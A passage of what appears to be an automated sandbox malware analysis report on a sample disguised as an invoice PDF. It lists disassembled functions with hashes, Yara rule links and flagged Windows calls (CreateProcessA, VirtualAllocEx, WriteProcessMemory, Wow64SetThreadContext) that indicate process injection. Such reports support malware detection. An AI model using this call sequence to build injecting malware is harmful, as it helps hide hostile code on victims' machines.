                                                                                      • Instruction Fuzzy Hash: 1B81D374A05318CFEB90DFA5E444BADBBF2FB09304F5081A9E809AB345C7785985CF51
                                                                                      Function 065C97B1 Relevance: 2.6, Strings: 2, Instructions: 138COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: "$xJ
                                                                                      • API String ID: 0-273369447
                                                                                      • Opcode ID: 01264af34ef09c323a28d343076522639261327c22088893c6d2a8c1e397e304
                                                                                      • Instruction ID: 199bf9c6731514872e5b2f81f4dbd313f7d82fe15c5b017fd080425d66cf6e1e
                                                                                      • Opcode Fuzzy Hash: 01264af34ef09c323a28d343076522639261327c22088893c6d2a8c1e397e304
                                                                                      • Instruction Fuzzy Hash: 4F41BF75A06119BFDB41CF95EC45AEEBBB5FF8A370F00412AE441ABA55C33644058BE2
                                                                                      Function 065C91D8 Relevance: 2.6, Strings: 2, Instructions: 110COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: "$xJ
                                                                                      • API String ID: 0-273369447
                                                                                      • Opcode ID: 60d6012885f378237486f090c58e7117fb102409bfc6518d9f69a668e3da09a8
                                                                                      • Instruction ID: 79ce8a63f8c1a4ac44a6543bca8a1f45d752cf05709022db511637909d3e2629
                                                                                      • Opcode Fuzzy Hash: 60d6012885f378237486f090c58e7117fb102409bfc6518d9f69a668e3da09a8
                                                                                      • Instruction Fuzzy Hash: DE413574D052089FDB54CFAAC814AEEBBBAFB89310F00C16AE854A7255CB355946CFA1
                                                                                      Function 065C0917 Relevance: 2.6, Strings: 2, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 1$xJ
                                                                                      • API String ID: 0-1182650164
                                                                                      • Opcode ID: 98280c5713062b67c2968b078bfda24d2779c25fadfe8e645f8ebb051030d377
                                                                                      • Instruction ID: 1fc074bc393c399a62ca17f110765513807bbf7fcd69dc2ba5aa2c130ede456d
                                                                                      • Opcode Fuzzy Hash: 98280c5713062b67c2968b078bfda24d2779c25fadfe8e645f8ebb051030d377
                                                                                      • Instruction Fuzzy Hash: 89311274904168CFDB50CFD8C884BAEBBB2FB49324F519198D459BB38AC735A985CF90
                                                                                      Function 065C9745 Relevance: 2.6, Strings: 2, Instructions: 58COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: "$xJ
                                                                                      • API String ID: 0-273369447
                                                                                      • Opcode ID: 51985f4d72e4c089cf27db75d75cd834be754aa06bd3f1095ddb83d95d3b1f7b
                                                                                      • Instruction ID: 09d70c228c427a92e61063fc13348d6d6374bbec1dd7fd73e4b7aafff0cf015e
                                                                                      • Opcode Fuzzy Hash: 51985f4d72e4c089cf27db75d75cd834be754aa06bd3f1095ddb83d95d3b1f7b
                                                                                      • Instruction Fuzzy Hash: B9212074A00108DFDB40CFA4D858BDDBBB2FB4A314F908269E911B7384C7394954DFA4
                                                                                      Function 069A2E66 Relevance: 2.5, Strings: 2, Instructions: 46COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2223664101.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_69a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: /$xJ
                                                                                      • API String ID: 0-1906059431
                                                                                      • Opcode ID: 5e2cddcb0e368d4f3f8c8a310f4baccba57e55c1f15cffd33c8829ff199ea744
                                                                                      • Instruction ID: c2e262e06c7a2cae633972adc6a05d916965e3e5d73020cfe6a32fada5c98eb3
                                                                                      • Opcode Fuzzy Hash: 5e2cddcb0e368d4f3f8c8a310f4baccba57e55c1f15cffd33c8829ff199ea744
                                                                                      • Instruction Fuzzy Hash: C521E274A802298FDB64DF28D898BDDB7B1FB49314F1041EAD919A3744DB309ED49F50
                                                                                      Function 065C7E53 Relevance: 2.5, Strings: 2, Instructions: 41COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 1$xJ
                                                                                      • API String ID: 0-1182650164
                                                                                      • Opcode ID: e01fc473498afe612d32a8e6c9c0f3df66e27dd1e3ed24a1d870b804855230f4
                                                                                      • Instruction ID: c38f97440bff99562071cf4ca23d1b64cf3cdff6e32a6472ee2c95016e99a462
                                                                                      • Opcode Fuzzy Hash: e01fc473498afe612d32a8e6c9c0f3df66e27dd1e3ed24a1d870b804855230f4
                                                                                      • Instruction Fuzzy Hash: 01015E74604119DFEB40CFA4E480AAD7BB1BB4A320F104859F816A7740C739CA80CF51
                                                                                      Function 065C7EEF Relevance: 2.5, Strings: 2, Instructions: 41COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 1$xJ
                                                                                      • API String ID: 0-1182650164
                                                                                      • Opcode ID: 9c89d81f8ddac192e6d22cc78743b9ac8fd4ab1292379d51fa8400b7ba260b18
                                                                                      • Instruction ID: c38f97440bff99562071cf4ca23d1b64cf3cdff6e32a6472ee2c95016e99a462
                                                                                      • Opcode Fuzzy Hash: 9c89d81f8ddac192e6d22cc78743b9ac8fd4ab1292379d51fa8400b7ba260b18
                                                                                      • Instruction Fuzzy Hash: 01015E74604119DFEB40CFA4E480AAD7BB1BB4A320F104859F816A7740C739CA80CF51
                                                                                      Function 065C7D92 Relevance: 2.5, Strings: 2, Instructions: 41COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 1$xJ
                                                                                      • API String ID: 0-1182650164
                                                                                      • Opcode ID: 6e8b9e4180f458c625bc35ef79d37aa35c5c71495794263ad94bd22a7e9b196b
                                                                                      • Instruction ID: 00cdc11a6e9301325012f66a2fec0d5bccbe7d13e170b8ebb11e5fc5bf837fc2
                                                                                      • Opcode Fuzzy Hash: 6e8b9e4180f458c625bc35ef79d37aa35c5c71495794263ad94bd22a7e9b196b
                                                                                      • Instruction Fuzzy Hash: 47018F74A05119DFDB40CFA4E884AAE7BF1FB4A321F044559F819A7740C738DA928F95
                                                                                      Function 00D78A25 Relevance: 2.5, Strings: 2, Instructions: 37COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2208167105.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: H$i
                                                                                      • API String ID: 0-1145978160
                                                                                      • Opcode ID: fa1d3a8f6e38ea2389e17a9b943371d8088e531fdbda8c7c35c2ed23bea73d1f
                                                                                      • Instruction ID: c96526468a17f891b51ea9c2a3b8f139436391c33841ed7eb127835cdd1bf441
                                                                                      • Opcode Fuzzy Hash: fa1d3a8f6e38ea2389e17a9b943371d8088e531fdbda8c7c35c2ed23bea73d1f
                                                                                      • Instruction Fuzzy Hash: 76116FB4901268CFDB60DF28D94879CB6B2BB98311F0485EAE44DA2250DB750EC1EF51
                                                                                      Function 066A8A1C Relevance: 2.5, Strings: 2, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Tesq$xJ
                                                                                      • API String ID: 0-4165237231
                                                                                      • Opcode ID: 205c621722848f514785fa4e54ee0ec074e6f8ad1bf31b148f81559b6ba3347b
                                                                                      • Instruction ID: 22f368c5271c35c1a62b11ded42a92ed1c607a9e640b45ed8f0c1dea14901deb
                                                                                      • Opcode Fuzzy Hash: 205c621722848f514785fa4e54ee0ec074e6f8ad1bf31b148f81559b6ba3347b
                                                                                      • Instruction Fuzzy Hash: B501C474A4121ACFDBA0DF28D884BADB7B2BB45300F1081A9E419A3745DB705EC5DF50
                                                                                      Function 065C5F27 Relevance: 2.5, Strings: 2, Instructions: 15COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0$xJ
                                                                                      • API String ID: 0-3758802048
                                                                                      • Opcode ID: 7d6860fd456cb43e5f6c0676286cda6391fa6adefb94ac3414bac6f52e5cbd1e
                                                                                      • Instruction ID: e5e06b0934b4859429d21007b7d1e2aa588822edeb32212b3792fe17a5f0e004
                                                                                      • Opcode Fuzzy Hash: 7d6860fd456cb43e5f6c0676286cda6391fa6adefb94ac3414bac6f52e5cbd1e
                                                                                      • Instruction Fuzzy Hash: DBE04678A20014CFD310EF54E8A4F4D77B9FB86304F008518A506A330CCA781D45DF20
                                                                                      Function 06762BE0 Relevance: 1.9, Strings: 1, Instructions: 677COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ,wq
                                                                                      • API String ID: 0-2764286452
                                                                                      • Opcode ID: 2f034791e7d03ed45a25f69c18f15f3c74bae1086aedd03d0ea8e1844cbcc542
                                                                                      • Instruction ID: f6706717db6d487483a71d4c10749c6df74555e43ff4a9d365725d34a09d20d5
                                                                                      • Opcode Fuzzy Hash: 2f034791e7d03ed45a25f69c18f15f3c74bae1086aedd03d0ea8e1844cbcc542
                                                                                      • Instruction Fuzzy Hash: 2B52E975A002289FDB64DF69C981BEDBBF2BF88310F1541D9E509A7391DA309E81CF61
                                                                                      Function 065CD0A0 Relevance: 1.8, Strings: 1, Instructions: 531COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (_sq
                                                                                      • API String ID: 0-3300063
                                                                                      • Opcode ID: d8fc67cf735780720e7bcbfafd7e11bd7829975133fbe66521ea6e143e1440c4
                                                                                      • Instruction ID: 83a7b812ac3b66fc8b65258ccee88dca610e612cd0fcf6a258d1633b52d5fafe
                                                                                      • Opcode Fuzzy Hash: d8fc67cf735780720e7bcbfafd7e11bd7829975133fbe66521ea6e143e1440c4
                                                                                      • Instruction Fuzzy Hash: 49227C35A002049FDB94CFA8D490AADBBF2FF88310F158169E905EB3A5DB71ED41CB90
                                                                                      Function 068E544C Relevance: 1.7, APIs: 1, Instructions: 202processCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 068E5632
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2223619295.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_68e0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateProcess
                                                                                      • String ID:
                                                                                      • API String ID: 963392458-0
                                                                                      • Opcode ID: d5a2a757a4d4a56cdb89c9881b1e23c03377231e8debddd5c495831a863dd21b
                                                                                      • Instruction ID: 76398dbde7430d2bc373e11e9d764cfc168baf09b33ae4487d5b6f571114c40e
                                                                                      • Opcode Fuzzy Hash: d5a2a757a4d4a56cdb89c9881b1e23c03377231e8debddd5c495831a863dd21b
                                                                                      • Instruction Fuzzy Hash: 0B8157B1D002499FDB50CFA9C8817EDBBF2BF49318F148529E915EB254D7758881CF92
                                                                                      Function 068E5458 Relevance: 1.7, APIs: 1, Instructions: 201processCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 068E5632
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2223619295.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_68e0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateProcess
                                                                                      • String ID:
                                                                                      • API String ID: 963392458-0
                                                                                      • Opcode ID: cf1362b0b2beb6d0aabe5fd6b7b5b0a7bd5b60805f80f6f4a407ce6a86f4b1e6
                                                                                      • Instruction ID: bbbdf0aa02d1590c82742d7e6e7d7fefa752cb3df8ed01e27563493a9040ac30
                                                                                      • Opcode Fuzzy Hash: cf1362b0b2beb6d0aabe5fd6b7b5b0a7bd5b60805f80f6f4a407ce6a86f4b1e6
                                                                                      • Instruction Fuzzy Hash: D0814771D006499FDB50CFA9C8817AEBBF2FF49318F148529E919EB250D7758881CF92
                                                                                      Function 068E7AD0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 068E7B60
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2223619295.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_68e0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID: MemoryProcessWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3559483778-0
                                                                                      • Opcode ID: 9a8c16bed41a2b1c0eb26989fc509d8d1ee44c54e5c485e3dc2b41ce167b57bd
                                                                                      • Instruction ID: 33a6996dc27371f2f2a76ff12e945e821d82bddbe410e0ed9bad4691e9af2acd
                                                                                      • Opcode Fuzzy Hash: 9a8c16bed41a2b1c0eb26989fc509d8d1ee44c54e5c485e3dc2b41ce167b57bd
                                                                                      • Instruction Fuzzy Hash: C921F8B5D003599FDB10DFAAC885BDEBBF5FF48320F108429E919A7240C7789544DBA4
                                                                                      Function 068E7ACE Relevance: 1.6, APIs: 1, Instructions: 68injectionCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 068E7B60
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2223619295.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_68e0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID: MemoryProcessWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3559483778-0
                                                                                      • Opcode ID: cb3c8f7579b4911dda370cd16cdbd24c354081f5e918a13dd48b30a591c3a27d
                                                                                      • Instruction ID: 884744a529d856008fd000f34f034411c7c9bb3a32d0be7476f734d6261bc6af
                                                                                      • Opcode Fuzzy Hash: cb3c8f7579b4911dda370cd16cdbd24c354081f5e918a13dd48b30a591c3a27d
                                                                                      • Instruction Fuzzy Hash: 4421F4B5D003599FDB10CFA9C985BEEBBF5FF48320F14842AE919A7240C7789944DBA0
                                                                                      Function 068E72B0 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 068E7336
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2223619295.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_68e0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID: ContextThreadWow64
                                                                                      • String ID:
                                                                                      • API String ID: 983334009-0
                                                                                      • Opcode ID: d385e57d94d7252f2e9ef1a62dd408f8d582b10874d1832df29f8280ab358619
                                                                                      • Instruction ID: 48b33fd99dee6cebecadd303699a12bb866b82b364d9e1e05ec0e6139578df72
                                                                                      • Opcode Fuzzy Hash: d385e57d94d7252f2e9ef1a62dd408f8d582b10874d1832df29f8280ab358619
                                                                                      • Instruction Fuzzy Hash: 342137B1D002098FDB60DFAAC4857EEBBF5AF98320F54842AD559A7340C7789945CFA0
                                                                                      Function 068E72B8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 068E7336
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2223619295.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_68e0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID: ContextThreadWow64
                                                                                      • String ID:
                                                                                      • API String ID: 983334009-0
                                                                                      • Opcode ID: c6bdf53ba9fb15c785dce611225e7b042e5e4af244b68d5f289aa89bd232fad7
                                                                                      • Instruction ID: 41295c02fbe9f61528868097f71788d02a182efb69b62a4b79301ff7c7ebcf10
                                                                                      • Opcode Fuzzy Hash: c6bdf53ba9fb15c785dce611225e7b042e5e4af244b68d5f289aa89bd232fad7
                                                                                      • Instruction Fuzzy Hash: BC2138B1D003098FDB50DFAAC4857EEBBF5EF49320F54842AD519A7240CB789944CFA0
                                                                                      Function 067522E8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222189418.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6750000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID: Sleep
                                                                                      • String ID:
                                                                                      • API String ID: 3472027048-0
                                                                                      • Opcode ID: ede43a89200b016215c024eff91a5c4259a1b0aa22ce71841043bd355ca2850a
                                                                                      • Instruction ID: dc80b8ccfbf6de66a73bd5a84fb91a529c75025aa5b27aa7fcc6fef87378b75c
                                                                                      • Opcode Fuzzy Hash: ede43a89200b016215c024eff91a5c4259a1b0aa22ce71841043bd355ca2850a
                                                                                      • Instruction Fuzzy Hash: 45119DB1D003598EDB10DFAAC845BEFFFF8AB98320F24841AD415A7240CA75A940CBA0
                                                                                      Function 06491228 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VirtualProtect.KERNEL32(?,?,?,?), ref: 064912A4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2220839867.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6490000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 544645111-0
                                                                                      • Opcode ID: a270920b1fc6fd1e158584559a98d6f18cfacc40d84cf67f268651c77d98f59c
                                                                                      • Instruction ID: 581ad0af16e3c9bea23881fc7fd16ef81ca9d61a4273aa8d97b784d8b828b77d
                                                                                      • Opcode Fuzzy Hash: a270920b1fc6fd1e158584559a98d6f18cfacc40d84cf67f268651c77d98f59c
                                                                                      • Instruction Fuzzy Hash: C42127B1D0024A9FDB10DFAAC884AEFFFF5AF98320F14842AE419A7240C7755940CFA0
                                                                                      Function 06491230 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VirtualProtect.KERNEL32(?,?,?,?), ref: 064912A4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2220839867.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6490000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 544645111-0
                                                                                      • Opcode ID: 94d79b7a8535d649a23e48135ab555ad7bb9011f9741644aa91c19dad4c6bbca
                                                                                      • Instruction ID: 3dbc2c4c2dbe5d5a6e85d9cf0c5f5e05878e01001bd7a37b05c3ae42c753c11b
                                                                                      • Opcode Fuzzy Hash: 94d79b7a8535d649a23e48135ab555ad7bb9011f9741644aa91c19dad4c6bbca
                                                                                      • Instruction Fuzzy Hash: 1011F4B1D002499FDB10DFAAC885ADFFBF5EF98320F14842AD419A7250C775A944CFA1
                                                                                      Function 067522F0 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222189418.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6750000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID: Sleep
                                                                                      • String ID:
                                                                                      • API String ID: 3472027048-0
                                                                                      • Opcode ID: 425d4180247e6a785ee11d2ef58e5c448814e091f9be684e70a4b74dbfdffd8c
                                                                                      • Instruction ID: b100293de6193ea3036f0cf7df2f361b1868c568dd2b42413dc883d5b231022c
                                                                                      • Opcode Fuzzy Hash: 425d4180247e6a785ee11d2ef58e5c448814e091f9be684e70a4b74dbfdffd8c
                                                                                      • Instruction Fuzzy Hash: 79114CB1D003598FDB10DFAAC4457EFFFF9AF58320F14841AD455A7240CA75A944CBA4
                                                                                      Function 068E7860 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 068E78CE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2223619295.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_68e0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 4275171209-0
                                                                                      • Opcode ID: 8ae3ebab4797c4e877e68bd3859a5e9c93f463dd0d190aece4fbb497a81ad2cc
                                                                                      • Instruction ID: 5f9ad4c307291c4c437e189e3ea232a364a027a8b537a46b5c6e30f141eeff2c
                                                                                      • Opcode Fuzzy Hash: 8ae3ebab4797c4e877e68bd3859a5e9c93f463dd0d190aece4fbb497a81ad2cc
                                                                                      • Instruction Fuzzy Hash: 4B1137719002499FCB10DFAAC845ADFBFF5EF98320F24881AE519A7250C775A544DFA0
                                                                                      Function 06761CF8 Relevance: 1.5, Strings: 1, Instructions: 234COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'sq
                                                                                      • API String ID: 0-1075809040
                                                                                      • Opcode ID: 881e57ef29ccc4450ee1d861f41eae2b4f3b0e486c66838c8f85be4d8b0c68b1
                                                                                      • Instruction ID: 18d409858c51a13c05a19a8f693cb70aca9ac7f68692a5501667faa20a34787f
                                                                                      • Opcode Fuzzy Hash: 881e57ef29ccc4450ee1d861f41eae2b4f3b0e486c66838c8f85be4d8b0c68b1
                                                                                      • Instruction Fuzzy Hash: E4A10F34A10218DFCB44EFA9D898A9DB7B2FF89300F558155E916AB361DB70EC46CF90
                                                                                      Function 06504AE0 Relevance: 1.5, Strings: 1, Instructions: 232COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221054323.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6500000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: d91256949dd5063b4fd8ed906dc31702dabd098b9f9552257204e995d2d41417
                                                                                      • Instruction ID: 8c2836f68107eaf22811bef97ec0eb2b1f82572a0af3ea5dedff709b8d5bc4ee
                                                                                      • Opcode Fuzzy Hash: d91256949dd5063b4fd8ed906dc31702dabd098b9f9552257204e995d2d41417
                                                                                      • Instruction Fuzzy Hash: 46A1F374E05218DFEB80DF98E5846ADBBF2FB49301F105429E616AB384CB709E44CFA1
                                                                                      Function 065C012C Relevance: 1.4, Strings: 1, Instructions: 164COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
